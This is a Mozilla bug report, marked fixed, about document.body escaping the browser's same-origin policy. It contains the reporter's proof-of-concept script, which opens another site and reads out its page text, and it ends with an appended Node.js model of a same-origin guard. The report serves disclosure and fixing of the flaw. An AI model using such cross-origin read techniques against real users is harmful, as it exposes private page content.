Closed
Bug 17977
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Reading documents using document.body
Categories
(Core :: Security, defect, P3)
VERIFIED
FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
Details
(Whiteboard: [PDT+])
document.body seems not to be protected by "Same origin" security policy. This leads to at least reading arbitrary documents.
The code is:
----------------------------------------
<SCRIPT>
function f(o)
{
  var s='';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}
a=window.open("http://www.yahoo.com");
setTimeout("alert(f(a.document.body))",10000);
</SCRIPT>
----------------------------------------
Assignee • Updated • 25 years ago
Status: NEW → ASSIGNED
Summary: Reading documents using document.body → [Dogfood] Reading documents using document.body
Assignee • Comment 1 • 25 years ago
Marking dogfood for analysis by PDT at jar's request.
Assignee • Updated • 25 years ago
Summary: [Dogfood] Reading documents using document.body → [DOGFOOD] Reading documents using document.body
Assignee • Updated • 25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT (1999112908) Com:
Javascript Error: access disallowed from scripts at http://www.nat.bg/~joro/mozilla/body1.html to documents at another domain
URL: http://www.nat.bg/~joro/mozilla/body1.html
LineNo: 16
Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/body1.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
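Added example, not part of the bug report and not Mozilla's fix: a small Node.js model of a deny-by-default same-origin guard, so that a property such as `body` cannot be left out of the check. The names `sameOrigin`, `guard` and `tryRead`, the `.example` URLs and the sample document are assumptions made up for this sketch; `f` is the reporter's traversal function from the description.

```javascript
// Model only: plain objects stand in for DOM nodes (constructed sample data).
class SecurityError extends Error {
  constructor(from, to) {
    super(`access disallowed from scripts at ${from} to documents at ${to}`);
    this.name = "SecurityError";
  }
}

// Same origin means same scheme, host and port (URL normalises default ports to '').
function sameOrigin(a, b) {
  const x = new URL(a), y = new URL(b);
  return x.protocol === y.protocol && x.hostname === y.hostname && x.port === y.port;
}

// Check on every property read, and wrap every object reached through the
// reference, so no individual property (body, childNodes, ...) can be missed.
function guard(node, scriptUrl, docUrl) {
  return new Proxy(node, {
    get(target, prop) {
      if (!sameOrigin(scriptUrl, docUrl)) throw new SecurityError(scriptUrl, docUrl);
      const v = Reflect.get(target, prop);
      return v !== null && typeof v === "object" ? guard(v, scriptUrl, docUrl) : v;
    },
  });
}

// The reporter's traversal function, unchanged in behaviour.
function f(o) {
  var s = '';
  var i;
  s = o.nodeValue;
  if (o.childNodes)
    for (i = 0; i < o.childNodes.length; i++)
      s += f(o.childNodes[i]);
  return s;
}

// Run f against a constructed document as seen from a script at scriptUrl.
function tryRead(scriptUrl, docUrl) {
  const doc = { body: { nodeValue: null, childNodes: [
    { nodeValue: "private page text", childNodes: [] } ] } };
  try {
    return f(guard(doc, scriptUrl, docUrl).body);
  } catch (e) {
    return e.name;
  }
}
```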